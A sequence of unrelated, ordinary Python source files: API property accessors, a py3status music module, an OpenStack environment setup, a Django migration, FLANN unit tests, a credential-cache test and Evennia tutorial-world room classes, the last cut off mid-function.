                Specify if scope of entity is Data center or Enterprise level

                
                This attribute is named `entityScope` in VSD API.
                
        """
        return self._entity_scope

    @entity_scope.setter
    def entity_scope(self, value):
        """ Set entity_scope value.

            Notes:
                Specify if scope of entity is Data center or Enterprise level

                
                This attribute is named `entityScope` in VSD API.
                
        """
        self._entity_scope = value

    
    @property
    def creation_date(self):
        """ Get creation_date value.

            Notes:
                Time stamp when this object was created.

                
                This attribute is named `creationDate` in VSD API.
                
        """
        return self._creation_date

    @creation_date.setter
    def creation_date(self, value):
        """ Set creation_date value.

            Notes:
                Time stamp when this object was created.

                
                This attribute is named `creationDate` in VSD API.
                
        """
        self._creation_date = value

    
    @property
    def owner(self):
        """ Get owner value.

            Notes:
                Identifies the user that has created this object.

                
        """
        return self._owner

    @owner.setter
    def owner(self, value):
        """ Set owner value.

            Notes:
                Identifies the user that has created this object.

                
        """
        self._owner = value

    
    @property
    def external_id(self):
        """ Get external_id value.

            Notes:
                External object ID. Used for integration with third party systems

                
                This attribute is named `externalID` in VSD API.
                
        """
        return self._external_id

    @external_id.setter
    def external_id(self, value):
        """ Set external_id value.

            Notes:
                External object ID. Used for integration with third party systems

                
                This attribute is named `externalID` in VSD API.
                
        """
        self._external_id = value

    
    @property
    def type(self):
        """ Get type value.

            Notes:
                The image type

                
        """
        return self._type

    @type.setter
    def type(self, value):
        """ Set type value.

            Notes:
                The image type

                
        """
        self._type = value

    

    
# -*- coding: utf-8 -*-
"""
Display currently playing song from Google Play Music Desktop Player.

Configuration parameters:
    cache_timeout:  how often we refresh this module in seconds (default 5)
    format:         specify the items and ordering of the data in the status bar.
                    These area 1:1 match to gpmdp-remote's options (default is '♫ {info}').

Format of status string placeholders:
    See `gpmdp-remote help`. Simply surround the items you want displayed (i.e. `album`)
    with curly braces (i.e. `{album}`) and place as-desired in the format string.

    {info}            Print info about now playing song
    {title}           Print current song title
    {artist}          Print current song artist
    {album}           Print current song album
    {album_art}       Print current song album art URL
    {time_current}    Print current song time in milliseconds
    {time_total}      Print total song time in milliseconds
    {status}          Print whether GPMDP is paused or playing
    {current}         Print now playing song in "artist - song" format
    {help}            Print this help message


Requires:
    gpmdp: http://www.googleplaymusicdesktopplayer.com/
    gpmdp-remote: https://github.com/iandrewt/gpmdp-remote

@author Aaron Fields https://twitter.com/spirotot
@license BSD
"""

from time import time
from subprocess import check_output


class Py3status:
    """
    """
    # available configuration parameters
    cache_timeout = 5
    format = u'♫ {info}'

    @staticmethod
    def _run_cmd(cmd):
        return check_output(['gpmdp-remote', cmd]).decode('utf-8').strip()

    def gpmdp(self, i3s_output_list, i3s_config):
        if self._run_cmd('status') == 'Paused':
            result = ''
        else:
            cmds = ['info', 'title', 'artist', 'album', 'status', 'current',
                    'time_total', 'time_current', 'album_art']
            data = {}
            for cmd in cmds:
                if '{%s}' % cmd in self.format:
                    data[cmd] = self._run_cmd(cmd)

            result = self.format.format(**data)

        response = {
            'cached_until': time() + self.cache_timeout,
            'full_text': result
        }
        return response


if __name__ == "__main__":
    """
    Run module in test mode.
    """
    from py3status.module_test import module_test
    module_test(Py3status)

#!/usr/bin/python

import os

# With the addition of Keystone, to use an openstack cloud you should
# authenticate against keystone, which returns a **Token** and **Service
# Catalog**.  The catalog contains the endpoint for all services the
# user/tenant has access to - including nova, glance, keystone, swift.
#
# *NOTE*: Using the 2.0 *auth api* does not mean that compute api is 2.0.  We
# will use the 1.1 *compute api*
os.environ['OS_AUTH_URL'] = "https://keystone.rc.nectar.org.au:5000/v2.0/"

# With the addition of Keystone we have standardized on the term **tenant**
# as the entity that owns the resources.
os.environ['OS_TENANT_ID'] = "123456789012345678901234567890"
os.environ['OS_TENANT_NAME'] = "tenant_name"

# In addition to the owning entity (tenant), openstack stores the entity
# performing the action as the **user**.
os.environ['OS_USERNAME'] = "joe.bloggs@uni.edu.au"

# With Keystone you pass the keystone password.
os.environ['OS_PASSWORD'] = "????????????????????"


# -*- coding: utf-8 -*-
from __future__ import absolute_import

from .local import Local  # noqa
from .production import Production  # noqa

# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app

# Possible discounts:
# - Node (administer inline with nodes)
# - Bulk amounts on nodes
# - User
# - Group of users
# - Order (this is more-or-less a voucher)
# - Shipping costs
# Possible amounts:
# - Percentage
# - Fixed amount
# Flag indicating if a discount can be combined with other discounts.
# Boolean "offer" to include in list of offers. Default to true if discount is at node level.
# Save all applied discounts when ordering in a ManyToMany relationship with Order.

import matplotlib.pyplot as plt
import numpy as np
import scalpplot
from scalpplot import plot_scalp
from positions import POS_10_5
from scipy import signal

def plot_timeseries(frames, time=None, offset=None, color='k', linestyle='-'):
  frames = np.asarray(frames)
  if offset == None:
    offset = np.max(np.std(frames, axis=0)) * 3
  if time == None:
    time = np.arange(frames.shape[0])
  plt.plot(time, frames - np.mean(frames, axis=0) + 
    np.arange(frames.shape[1]) * offset, color=color, ls=linestyle)


def plot_scalpgrid(scalps, sensors, locs=POS_10_5, width=None, 
  clim=None, cmap=None, titles=None):
  '''
  Plots a grid with scalpplots. Scalps contains the different scalps in the
  rows, sensors contains the names for the columns of scalps, locs is a dict
  that maps the sensor-names to locations.

  Width determines the width of the grid that contains the plots. Cmap selects
  a colormap, for example plt.cm.RdBu_r is very useful for AUC-ROC plots.
  Clim is a list containing the minimim and maximum value mapped to a color.

  Titles is an optional list with titles for each subplot.

  Returns a list with subplots for further manipulation.
  '''
  scalps = np.asarray(scalps)
  assert scalps.ndim == 2
  nscalps = scalps.shape[0]
  subplots = []

  if not width:
    width = int(min(8, np.ceil(np.sqrt(nscalps))))
  height = int(np.ceil(nscalps/float(width)))

  if not clim:
    clim = [np.min(scalps), np.max(scalps)]

  plt.clf()
  for i in range(nscalps):
    subplots.append(plt.subplot(height, width, i + 1))
    plot_scalp(scalps[i], sensors, locs, clim=clim, cmap=cmap)
    if titles:
      plt.title(titles[i])

  # plot colorbar next to last scalp
  bb = plt.gca().get_position()
  plt.colorbar(cax=plt.axes([bb.xmax + bb.width/10, bb.ymin, bb.width/10,
    bb.height]), ticks=np.linspace(clim[0], clim[1], 5).round(2))

  return subplots

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
        ('setlist', '0012_remove_show_leg'),
    ]

    operations = [
        migrations.CreateModel(
            name='Show2',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('venue', models.ForeignKey(to='setlist.Venue', to_field='id')),
                ('tour', models.ForeignKey(to='setlist.Tour', to_field='id')),
                ('date', models.DateField(db_index=True)),
                ('setlist', models.TextField(default=b'', blank=True)),
                ('notes', models.TextField(default=b'', blank=True)),
                ('source', models.TextField(default=b'', blank=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]

#!/usr/bin/env python
import sys
from os.path import *
import os
from pyflann import *
from copy import copy
from numpy import *
from numpy.random import *
import unittest

class Test_PyFLANN_nn(unittest.TestCase):

    def setUp(self):
        self.nn = FLANN(log_level="warning")

    ################################################################################
    # The typical
    
    def test_nn_2d_10pt(self):
        self.__nd_random_test_autotune(2, 2)
        
    def test_nn_autotune_2d_1000pt(self):
        self.__nd_random_test_autotune(2, 1000)

    def test_nn_autotune_100d_1000pt(self):
        self.__nd_random_test_autotune(100, 1000)
    
    def test_nn_autotune_500d_100pt(self):
        self.__nd_random_test_autotune(500, 100)
    
    #
    #    ##########################################################################################
    #    # Stress it should handle
    #
    def test_nn_stress_1d_1pt_kmeans_autotune(self):
        self.__nd_random_test_autotune(1, 1)
    
    def __ensure_list(self,arg):
        if type(arg)!=list:
            return [arg]
        else:
            return arg


    def __nd_random_test_autotune(self, dim, N, num_neighbors = 1, **kwargs):
        """
        Make a set of random points, then pass the same ones to the
        query points.  Each point should be closest to itself.
        """
        seed(0)
        x = rand(N, dim)
        xq = rand(N, dim)
        perm = permutation(N)

        # compute ground truth nearest neighbors
        gt_idx, gt_dist = self.nn.nn(x,xq, 
                algorithm='linear', 
                num_neighbors=num_neighbors)
        
        for tp in [0.70, 0.80, 0.90]:
            nidx,ndist = self.nn.nn(x, xq, 
                    algorithm='autotuned', 
                    sample_fraction=1.0, 
                    num_neighbors = num_neighbors, 
                    target_precision = tp, checks=-2, **kwargs)

            correctness = 0.0
            for i in xrange(N):
                l1 = self.__ensure_list(nidx[i])
                l2 = self.__ensure_list(gt_idx[i])
                correctness += float(len(set(l1).intersection(l2)))/num_neighbors
            correctness /= N
            self.assert_(correctness >= tp*0.9,
                         'failed #1: targ_prec=%f, N=%d,correctness=%f' % (tp, N, correctness))
        
if __name__ == '__main__':
    unittest.main()

# -*- coding: utf-8 -*-
from collections import OrderedDict
import locale
from optparse import make_option
from verify.management.commands import VerifyBaseCommand
from verify.models import *
from verify.politici_models import *
from django.db.models import Q, Count

__author__ = 'guglielmo'



class Command(VerifyBaseCommand):
    """
    Report delle statistiche di genere complessive, a livello nazionale,
    per tutti gli organi di tutte le istituzioni.
    Può limitarsi a una o più istituzioni, se si passa un elenco di institution_id
    """
    args = '<institution_id institution_id ...>'
    help = "Check that all locations have only male components (list locations with female components)."

    option_list = VerifyBaseCommand.option_list

    def execute_verification(self, *args, **options):

        self.csv_headers = ["ISTITUZIONE", "INCARICO", "N_DONNE", "N_UOMINI", "N_TOTALI", "PERC_DONNE", "PERC_UOMINI"]

        institutions = OpInstitution.objects.using('politici').all()
        if args:
            institutions = institutions.filter(id__in=args)
            self.logger.info(
                "Verification {0} launched with institutions limited to {1}".format(
                    self.__class__.__module__, ",".join(institutions.values_list('id', flat=True))
                )
            )
        else:
            self.logger.info(
                "Verification {0} launched for all institutions".format(
                    self.__class__.__module__
                )
            )

        self.ok_locs = []
        self.ko_locs = []

        for institution in institutions:

            charge_types_ids = OpInstitutionCharge.objects.using('politici').\
                filter(date_end__isnull=True,
                       content__deleted_at__isnull=True).\
                filter(institution=institution).\
                values_list('charge_type', flat=True).\
                distinct()
            charge_types = OpChargeType.objects.using('politici').\
                filter(id__in=charge_types_ids)

            for charge_type in charge_types:
                self.logger.info(
                    "Counting {0} in {1}".format(
                        charge_type.name, institution.name
                    )
                )
                qs = OpInstitutionCharge.objects.using('politici').\
                    filter(date_end__isnull=True,
                           content__deleted_at__isnull=True).\
                    filter(institution=institution,
                           charge_type=charge_type)

                n_tot = qs.count()
                n_fem = qs.filter(politician__sex__iexact='f').count()
                n_mal = n_tot - n_fem

                merged = [institution.name, charge_type.name, n_fem, n_mal, n_tot,]
                merged.append(locale.format("%.2f",100. * n_fem / float(n_tot) ))
                merged.append(locale.format("%.2f",100. * n_mal / float(n_tot) ))
                self.ko_locs.append(merged)

        outcome = Verification.OUTCOME.failed
        self.logger.info(
            "Report for {0} institutions generated.".format(
                len(self.ko_locs)
            )
        )
        return outcome



#!/usr/bin/env python
from distutils.core import setup

setup(name='django-modeltranslation',
      version='0.4.0-alpha1',
      description='Translates Django models using a registration approach.',
      long_description='The modeltranslation application can be used to '
                       'translate dynamic content of existing models to an '
                       'arbitrary number of languages without having to '
                       'change the original model classes. It uses a '
                       'registration approach (comparable to Django\'s admin '
                       'app) to be able to add translations to existing or '
                       'new projects and is fully integrated into the Django '
                       'admin backend.',
      author='Peter Eschler',
      author_email='p.eschler@nmy.de',
      maintainer='Dirk Eschler',
      maintainer_email='d.eschler@nmy.de',
      url='http://code.google.com/p/django-modeltranslation/',
      packages=['modeltranslation', 'modeltranslation.management',
                'modeltranslation.management.commands'],
      package_data={'modeltranslation': ['static/modeltranslation/css/*.css',
                                         'static/modeltranslation/js/*.js']},
      include_package_data = True,
      requires=['django(>=1.0)'],
      download_url='http://django-modeltranslation.googlecode.com/files/django-modeltranslation-0.4.0-alpha1.tar.gz',
      classifiers=['Framework :: Django',
                   'Intended Audience :: Developers',
                   'License :: OSI Approved :: BSD License'],
      license='New BSD')

#!/usr/bin/python

# Copyright (c) 2009, Purdue University
# All rights reserved.
# 
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
# 
# Neither the name of the Purdue University nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
# 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.


"""Test for Credential cache library."""

__copyright__ = 'Copyright (C) 2009, Purdue University'
__license__ = 'BSD'
__version__ = '#TRUNK#'


import unittest
import os

import roster_core
from roster_server import credentials


CONFIG_FILE = 'test_data/roster.conf' # Example in test_data
SCHEMA_FILE = '../roster-core/data/database_schema.sql'
DATA_FILE = 'test_data/test_data.sql'


class TestCredentialsLibrary(unittest.TestCase):

  def setUp(self):
    self.config_instance = roster_core.Config(file_name=CONFIG_FILE)
    self.cred_instance = credentials.CredCache(self.config_instance,
                                               u'sharrell')
    db_instance = self.config_instance.GetDb()

    db_instance.CreateRosterDatabase()

    data = open(DATA_FILE, 'r').read()
    db_instance.StartTransaction()
    db_instance.cursor.execute(data)
    db_instance.EndTransaction()
    db_instance.close()

    self.core_instance = roster_core.Core(u'sharrell', self.config_instance)

  def is_valid_uuid (self, uuid):
    """
    TAKEN FROM THE BLUEZ MODULE

    is_valid_uuid (uuid) -> bool

    returns True if uuid is a valid 128-bit UUID.

    valid UUIDs are always strings taking one of the following forms:
        XXXX
        XXXXXXXX
        XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
    where each X is a hexadecimal digit (case insensitive)
    """
    try:
      if len (uuid) == 4:
        if int (uuid, 16) < 0: return False
      elif len (uuid) == 8:
        if int (uuid, 16) < 0: return False
      elif len (uuid) == 36:
        pieces = uuid.split ("-")
        if len (pieces) != 5 or \
              len (pieces[0]) != 8 or \
              len (pieces[1]) != 4 or \
              len (pieces[2]) != 4 or \
              len (pieces[3]) != 4 or \
              len (pieces[4]) != 12:
          return False
        [ int (p, 16) for p in pieces ]
      else:
        return False
    except ValueError:
      return False
    except TypeError:
      return False
    return True

  def testCredentials(self):
    self.assertTrue(self.cred_instance.Authenticate(u'sharrell', 'test'))
    cred_string = self.cred_instance.GetCredentials(u'sharrell', 'test',
                                                    self.core_instance)
    self.assertEqual(self.cred_instance.CheckCredential(cred_string,
                                                        u'sharrell',
                                                       self.core_instance),
                     u'')
    self.assertEqual(self.cred_instance.CheckCredential(u'test', u'sharrell',
                                                        self.core_instance),
                     None)

if( __name__ == '__main__' ):
  unittest.main()

#!/usr/bin/env python
import sys
import hyperdex.client
from hyperdex.client import LessEqual, GreaterEqual, Range, Regex, LengthEquals, LengthLessEqual, LengthGreaterEqual
c = hyperdex.client.Client(sys.argv[1], int(sys.argv[2]))
def to_objectset(xs):
    return set([frozenset(x.items()) for x in xs])
assert c.put('kv', 'k', {}) == True
assert c.get('kv', 'k') == {'v': {}}
assert c.put('kv', 'k', {'v': {1: 3.14, 2: 0.25, 3: 1.0}}) == True
assert c.get('kv', 'k') == {'v': {1: 3.14, 2: 0.25, 3: 1.0}}
assert c.put('kv', 'k', {'v': {}}) == True
assert c.get('kv', 'k') == {'v': {}}

"""

Room Typeclasses for the TutorialWorld.

This defines special types of Rooms available in the tutorial. To keep
everything in one place we define them together with the custom
commands needed to control them. Those commands could also have been
in a separate module (e.g. if they could have been re-used elsewhere.)

"""
from __future__ import print_function

import random
from evennia import TICKER_HANDLER
from evennia import CmdSet, Command, DefaultRoom
from evennia import utils, create_object, search_object
from evennia import syscmdkeys, default_cmds
from evennia.contrib.tutorial_world.objects import LightSource

# the system error-handling module is defined in the settings. We load the
# given setting here using utils.object_from_module. This way we can use
# it regardless of if we change settings later.
from django.conf import settings
_SEARCH_AT_RESULT = utils.object_from_module(settings.SEARCH_AT_RESULT)

# -------------------------------------------------------------
#
# Tutorial room - parent room class
#
# This room is the parent of all rooms in the tutorial.
# It defines a tutorial command on itself (available to
# all those who are in a tutorial room).
#
# -------------------------------------------------------------

#
# Special command available in all tutorial rooms


class CmdTutorial(Command):
    """
    Get help during the tutorial

    Usage:
      tutorial [obj]

    This command allows you to get behind-the-scenes info
    about an object or the current location.

    """
    key = "tutorial"
    aliases = ["tut"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """
        All we do is to scan the current location for an Attribute
        called `tutorial_info` and display that.
        """

        caller = self.caller

        if not self.args:
            target = self.obj  # this is the room the command is defined on
        else:
            target = caller.search(self.args.strip())
            if not target:
                return
        helptext = target.db.tutorial_info
        if helptext:
            caller.msg("|G%s|n" % helptext)
        else:
            caller.msg("|RSorry, there is no tutorial help available here.|n")


# for the @detail command we inherit from MuxCommand, since
# we want to make use of MuxCommand's pre-parsing of '=' in the
# argument.
class CmdTutorialSetDetail(default_cmds.MuxCommand):
    """
    sets a detail on a room

    Usage:
        @detail <key> = <description>
        @detail <key>;<alias>;... = description

    Example:
        @detail walls = The walls are covered in ...
        @detail castle;ruin;tower = The distant ruin ...

    This sets a "detail" on the object this command is defined on
    (TutorialRoom for this tutorial). This detail can be accessed with
    the TutorialRoomLook command sitting on TutorialRoom objects (details
    are set as a simple dictionary on the room). This is a Builder command.

    We custom parse the key for the ;-separator in order to create
    multiple aliases to the detail all at once.
    """
    key = "@detail"
    locks = "cmd:perm(Builder)"
    help_category = "TutorialWorld"

    def func(self):
        """
        All this does is to check if the object has
        the set_detail method and uses it.
        """
        if not self.args or not self.rhs:
            self.caller.msg("Usage: @detail key = description")
            return
        if not hasattr(self.obj, "set_detail"):
            self.caller.msg("Details cannot be set on %s." % self.obj)
            return
        for key in self.lhs.split(";"):
            # loop over all aliases, if any (if not, this will just be
            # the one key to loop over)
            self.obj.set_detail(key, self.rhs)
        self.caller.msg("Detail set: '%s': '%s'" % (self.lhs, self.rhs))


class CmdTutorialLook(default_cmds.CmdLook):
    """
    looks at the room and on details

    Usage:
        look <obj>
        look <room detail>
        look *<account>

    Observes your location, details at your location or objects
    in your vicinity.

    Tutorial: This is a child of the default Look command, that also
    allows us to look at "details" in the room.  These details are
    things to examine and offers some extra description without
    actually having to be actual database objects. It uses the
    return_detail() hook on TutorialRooms for this.
    """
    # we don't need to specify key/locks etc, this is already
    # set by the parent.
    help_category = "TutorialWorld"

    def func(self):
        """
        Handle the looking. This is a copy of the default look
        code except for adding in the details.
        """
        caller = self.caller
        args = self.args
        if args:
            # we use quiet=True to turn off automatic error reporting.
            # This tells search that we want to handle error messages
            # ourself. This also means the search function will always
            # return a list (with 0, 1 or more elements) rather than
            # result/None.
            looking_at_obj = caller.search(args,
                                           # note: excludes room/room aliases
                                           candidates=caller.location.contents + caller.contents,
                                           use_nicks=True, quiet=True)
            if len(looking_at_obj) != 1:
                # no target found or more than one target found (multimatch)
                # look for a detail that may match
                detail = self.obj.return_detail(args)
                if detail:
                    self.caller.msg(detail)
                    return
                else:
                    # no detail found, delegate our result to the normal
                    # error message handler.
                    _SEARCH_AT_RESULT(None, caller, args, looking_at_obj)
                    return
            else:
                # we found a match, extract it from the list and carry on
                # normally with the look handling.
                looking_at_obj = looking_at_obj[0]

        else:
            looking_at_obj = caller.location
            if not looking_at_obj:
                caller.msg("You have no location to look at!")
                return

        if not hasattr(looking_at_obj, 'return_appearance'):
            # this is likely due to us having an account instead
            looking_at_obj = looking_at_obj.character
        if not looking_at_obj.access(caller, "view"):
            caller.msg("Could not find '%s'." % args)
            return
        # get object's appearance
        caller.msg(looking_at_obj.return_appearance(caller))
        # the object's at_desc() method.
        looking_at_obj.at_desc(looker=caller)
        return


class TutorialRoomCmdSet(CmdSet):
    """
    Implements the simple tutorial cmdset. This will overload the look
    command in the default CharacterCmdSet since it has a higher
    priority (ChracterCmdSet has prio 0)
    """
    key = "tutorial_cmdset"
    priority = 1

    def at_cmdset_creation(self):
        """add the tutorial-room commands"""
        self.add(CmdTutorial())
        self.add(CmdTutorialSetDetail())
        self.add(CmdTutorialLook())


class TutorialRoom(DefaultRoom):
    """
    This is the base room type for all rooms in the tutorial world.
    It defines a cmdset on itself for reading tutorial info about the location.
    """

    def at_object_creation(self):
        """Called when room is first created"""
        self.db.tutorial_info = "This is a tutorial room. It allows you to use the 'tutorial' command."
        self.cmdset.add_default(TutorialRoomCmdSet)

    def at_object_receive(self, new_arrival, source_location):
        """
        When an object enter a tutorial room we tell other objects in
        the room about it by trying to call a hook on them. The Mob object
        uses this to cheaply get notified of enemies without having
        to constantly scan for them.

        Args:
            new_arrival (Object): the object that just entered this room.
            source_location (Object): the previous location of new_arrival.

        """
        if new_arrival.has_account and not new_arrival.is_superuser:
            # this is a character
            for obj in self.contents_get(exclude=new_arrival):
                if hasattr(obj, "at_new_arrival"):
                    obj.at_new_arrival(new_arrival)

    def return_detail(self, detailkey):
        """
        This looks for an Attribute "obj_details" and possibly
        returns the value of it.

        Args:
            detailkey (str): The detail being looked at. This is
                case-insensitive.

        """
        details = self.db.details
        if details:
            return details.get(detailkey.lower(), None)

    def set_detail(self, detailkey, description):
        """
        This sets a new detail, using an Attribute "details".

        Args:
            detailkey (str): The detail identifier to add (for
                aliases you need to add multiple keys to the
                same description). Case-insensitive.
            description (str): The text to return when looking
                at the given detailkey.

        """
        if self.db.details:
            self.db.details[detailkey.lower()] = description
        else:
            self.db.details = {detailkey.lower(): description}


# -------------------------------------------------------------
#
# Weather room - room with a ticker
#
# -------------------------------------------------------------

# These are rainy weather strings
WEATHER_STRINGS = (
    "The rain coming down from the iron-grey sky intensifies.",
    "A gust of wind throws the rain right in your face. Despite your cloak you shiver.",
    "The rainfall eases a bit and the sky momentarily brightens.",
    "For a moment it looks like the rain is slowing, then it begins anew with renewed force.",
    "The rain pummels you with large, heavy drops. You hear the rumble of thunder in the distance.",
    "The wind is picking up, howling around you, throwing water droplets in your face. It's cold.",
    "Bright fingers of lightning flash over the sky, moments later followed by a deafening rumble.",
    "It rains so hard you can hardly see your hand in front of you. You'll soon be drenched to the bone.",
    "Lightning strikes in several thundering bolts, striking the trees in the forest to your west.",
    "You hear the distant howl of what sounds like some sort of dog or wolf.",
    "Large clouds rush across the sky, throwing their load of rain over the world.")


class WeatherRoom(TutorialRoom):
    """
    This should probably better be called a rainy room...

    This sets up an outdoor room typeclass. At irregular intervals,
    the effects of weather will show in the room. Outdoor rooms should
    inherit from this.

    """

    def at_object_creation(self):
        """
        Called when object is first created.
        We set up a ticker to update this room regularly.

        Note that we could in principle also use a Script to manage
        the ticking of the room; the TickerHandler works fine for
        simple things like this though.
        """
        super(WeatherRoom, self).at_object_creation()
        # subscribe ourselves to a ticker to repeatedly call the hook
        # "update_weather" on this object. The interval is randomized
        # so as to not have all weather rooms update at the same time.
        self.db.interval = random.randint(50, 70)
        TICKER_HANDLER.add(interval=self.db.interval, callback=self.update_weather, idstring="tutorial")
        # this is parsed by the 'tutorial' command on TutorialRooms.
        self.db.tutorial_info = \
            "This room has a Script running that has it echo a weather-related message at irregular intervals."

    def update_weather(self, *args, **kwargs):
        """
        Called by the tickerhandler at regular intervals. Even so, we
        only update 20% of the time, picking a random weather message
        when we do. The tickerhandler requires that this hook accepts
        any arguments and keyword arguments (hence the *args, **kwargs
        even though we don't actually use them in this example)
        """
        if random.random() < 0.2:
            # only update 20 % of the time
            self.msg_contents("|w%s|n" % random.choice(WEATHER_STRINGS))


SUPERUSER_WARNING = "\nWARNING: You are playing as a superuser ({name}). Use the {quell} command to\n" \
                    "play without superuser privileges (many functions and puzzles ignore the \n" \
                    "presence of a superuser, making this mode useful for exploring things behind \n" \
                    "the scenes later).\n" \


# ------------------------------------------------------------
#
# Intro Room - unique room
#
# This room marks the start of the tutorial. It sets up properties on
# the player char that is needed for the tutorial.
#
# -------------------------------------------------------------


class IntroRoom(TutorialRoom):
    """
    Intro room

    properties to customize:
     char_health - integer > 0 (default 20)
    """

    def at_object_creation(self):
        """
        Called when the room is first created.
        """
        super(IntroRoom, self).at_object_creation()
        self.db.tutorial_info = "The first room of the tutorial. " \
                                "This assigns the health Attribute to "\
                                "the account."

    def at_object_receive(self, character, source_location):
        """
        Assign properties on characters
        """

        # setup character for the tutorial
        health = self.db.char_health or 20

        if character.has_account:
            character.db.health = health
            character.db.health_max = health

        if character.is_superuser:
            string = "-" * 78 + SUPERUSER_WARNING + "-" * 78
            character.msg("|r%s|n" % string.format(name=character.key, quell="|w@quell|r"))


# -------------------------------------------------------------
#
# Bridge - unique room
#
# Defines a special west-eastward "bridge"-room, a large room that takes
# several steps to cross. It is complete with custom commands and a
# chance of falling off the bridge. This room has no regular exits,
# instead the exitings are handled by custom commands set on the account
# upon first entering the room.
#
# Since one can enter the bridge room from both ends, it is
# divided into five steps:
#       westroom <- 0 1 2 3 4 -> eastroom
#
# -------------------------------------------------------------


class CmdEast(Command):
    """
    Go eastwards across the bridge.

    Tutorial info:
        This command relies on the caller having two Attributes
        (assigned by the room when entering):
            - east_exit: a unique name or dbref to the room to go to
              when exiting east.
            - west_exit: a unique name or dbref to the room to go to
              when exiting west.
       The room must also have the following Attributes
           - tutorial_bridge_posistion: the current position on
             on the bridge, 0 - 4.

    """
    key = "east"
    aliases = ["e"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """move one step eastwards"""
        caller = self.caller

        bridge_step = min(5, caller.db.tutorial_bridge_position + 1)

        if bridge_step > 4:
            # we have reached the far east end of the bridge.
            # Move to the east room.
            eexit = search_object(self.obj.db.east_exit)
            if eexit:
                caller.move_to(eexit[0])
            else:
                caller.msg("No east exit was found for this room. Contact an admin.")
            return
        caller.db.tutorial_bridge_position = bridge_step
        # since we are really in one room, we have to notify others
        # in the room when we move.
        caller.location.msg_contents("%s steps eastwards across the bridge." % caller.name, exclude=caller)
        caller.execute_cmd("look")


# go back across the bridge
class CmdWest(Command):
    """
    Go westwards across the bridge.

    Tutorial info:
       This command relies on the caller having two Attributes
       (assigned by the room when entering):
           - east_exit: a unique name or dbref to the room to go to
             when exiting east.
           - west_exit: a unique name or dbref to the room to go to
             when exiting west.
       The room must also have the following property:
           - tutorial_bridge_posistion: the current position on
             on the bridge, 0 - 4.

    """
    key = "west"
    aliases = ["w"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """move one step westwards"""
        caller = self.caller

        bridge_step = max(-1, caller.db.tutorial_bridge_position - 1)

        if bridge_step < 0:
            # we have reached the far west end of the bridge.
            # Move to the west room.
            wexit = search_object(self.obj.db.west_exit)
            if wexit:
                caller.move_to(wexit[0])
            else:
                caller.msg("No west exit was found for this room. Contact an admin.")
            return
        caller.db.tutorial_bridge_position = bridge_step
        # since we are really in one room, we have to notify others
        # in the room when we move.
        caller.location.msg_contents("%s steps westwards across the bridge." % caller.name, exclude=caller)
        caller.execute_cmd("look")


BRIDGE_POS_MESSAGES = ("You are standing |wvery close to the the bridge's western foundation|n."
                       " If you go west you will be back on solid ground ...",
                       "The bridge slopes precariously where it extends eastwards"
                       " towards the lowest point - the center point of the hang bridge.",
                       "You are |whalfways|n out on the unstable bridge.",
                       "The bridge slopes precariously where it extends westwards"
                       " towards the lowest point - the center point of the hang bridge.",
                       "You are standing |wvery close to the bridge's eastern foundation|n."
                       " If you go east you will be back on solid ground ...")
BRIDGE_MOODS = ("The bridge sways in the wind.", "The hanging bridge creaks dangerously.",
                "You clasp the ropes firmly as the bridge sways and creaks under you.",
                "From the castle you hear a distant howling sound, like that of a large dog or other beast.",
                "The bridge creaks under your feet. Those planks does not seem very sturdy.",
                "Far below you the ocean roars and throws its waves against the cliff,"
                " as if trying its best to reach you.",
                "Parts of the bridge come loose behind you, falling into the chasm far below!",
                "A gust of wind causes the bridge to sway precariously.",
                "Under your feet a plank comes loose, tumbling down. For a moment you dangle over the abyss ...",
                "The section of rope you hold onto crumble in your hands,"
                " parts of it breaking apart. You sway trying to regain balance.")

FALL_MESSAGE = "Suddenly the plank you stand on gives way under your feet! You fall!" \
               "\nYou try to grab hold of an adjoining plank, but all you manage to do is to " \
               "divert your fall westwards, towards the cliff face. This is going to hurt ... " \
               "\n ... The world goes dark ...\n\n"


class CmdLookBridge(Command):
    """
    looks around at the bridge.

    Tutorial info:
        This command assumes that the room has an Attribute
        "fall_exit", a unique name or dbref to the place they end upp
        if they fall off the bridge.
    """
    key = 'look'
    aliases = ["l"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """Looking around, including a chance to fall."""
        caller = self.caller
        bridge_position = self.caller.db.tutorial_bridge_position
        # this command is defined on the room, so we get it through self.obj
        location = self.obj
        # randomize the look-echo
        message = "|c%s|n\n%s\n%s" % (location.key,
                                      BRIDGE_POS_MESSAGES[bridge_position],
                                      random.choice(BRIDGE_MOODS))

